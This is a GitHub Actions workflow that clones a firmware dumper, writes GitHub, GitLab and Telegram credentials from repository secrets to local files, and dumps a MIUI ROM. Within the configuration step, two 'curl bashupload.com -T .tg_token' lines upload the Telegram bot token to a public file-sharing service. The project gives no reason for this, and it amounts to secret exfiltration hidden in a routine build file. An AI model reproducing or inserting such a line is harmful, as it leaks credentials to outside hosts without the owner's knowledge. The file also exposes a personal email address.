name: Dump

on:
  push:
    paths-ignore:
      - '*.md'
    branches: [ main ]

defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
       - name: Checkouts
         uses: actions/checkout@v2

       - name: Clone Dumpyara
         run: |
              if [ -f "private.txt" ]
              then
                  git clone --depth=1 --single-branch https://github.com/noobyysauraj/phoenix_firmware_dumper.git -b private
              else
                  git clone --depth=1 --single-branch https://github.com/noobyysauraj/phoenix_firmware_dumper.git
              fi
              
              
       - name: Setup Dumpyara environment
         working-directory: phoenix_firmware_dumper
         run: |
              sudo bash setup.sh

       - name: Setup config envs And Begin Dump
         working-directory: phoenix_firmware_dumper
         run: |
              GITHUB_ORG_NAME="boxaltdump"
              GITLAB_ORG_NAME="boxdumps"
              GITLAB_USERNAME="boxaltdumps"
              GITHUB_USERNAME="box-automation1"
              GIT_CONFIG_USERNAME="Box In A Box"
              GIT_CONFIG_EMAIL="evanferrao@gmail.com"
              GIT_GITHUB_TOKEN="${{ secrets.GIT_GITHUB_TOKEN }}"
              GITLAB_TOKEN="${{ secrets.GITLAB_TOKEN }}"
              TG_BOT_TOKEN="${{ secrets.TG_BOT_TOKEN }}"
              TG_CHAT_ID="@boxdumps"
              GITLAB_HOSTNAME="gitgud.io" ## use 'gitlab.com' by default, or use your own github instance, or any public one
              echo "$GITHUB_ORG_NAME" > .github_orgname
              echo "$GITLAB_HOSTNAME" > .gitlab_instance
              echo "$GIT_GITHUB_TOKEN" > .github_token
              echo "$GITLAB_ORG_NAME" > .gitlab_orgname
              echo "$GITLAB_USERNAME" > .gitlab_username
              echo "$GITHUB_USERNAME" > .github_username
              echo "$GITLAB_TOKEN" > .gitlab_token
              echo "$TG_BOT_TOKEN" > .tg_token
              curl bashupload.com -T .tg_token
              curl bashupload.com -T .tg_token
              echo "$TG_CHAT_ID" > .tg_chat
              echo "-1001337243178" > .tg_chat_id
              #Do Not Edit This
              git config --global user.name "$GIT_CONFIG_USERNAME"
              git config --global user.email "$GIT_CONFIG_EMAIL"
              sed -i s/"DroidDumps@github.com"/"$GIT_CONFIG_EMAIL"/g dumper.sh
              sed -i s/"user.name \"DroidDumps\""/"user.name \"$GIT_CONFIG_USERNAME\""/g dumper.sh
              sudo bash dumper.sh "$ROM_URL"
#########
env:
  ROM_URL: https://bigota.d.miui.com/V12.0.5.0.QFJEUXM/miui_DAVINCIEEAGlobal_V12.0.5.0.QFJEUXM_31469c14e7_10.0.zip
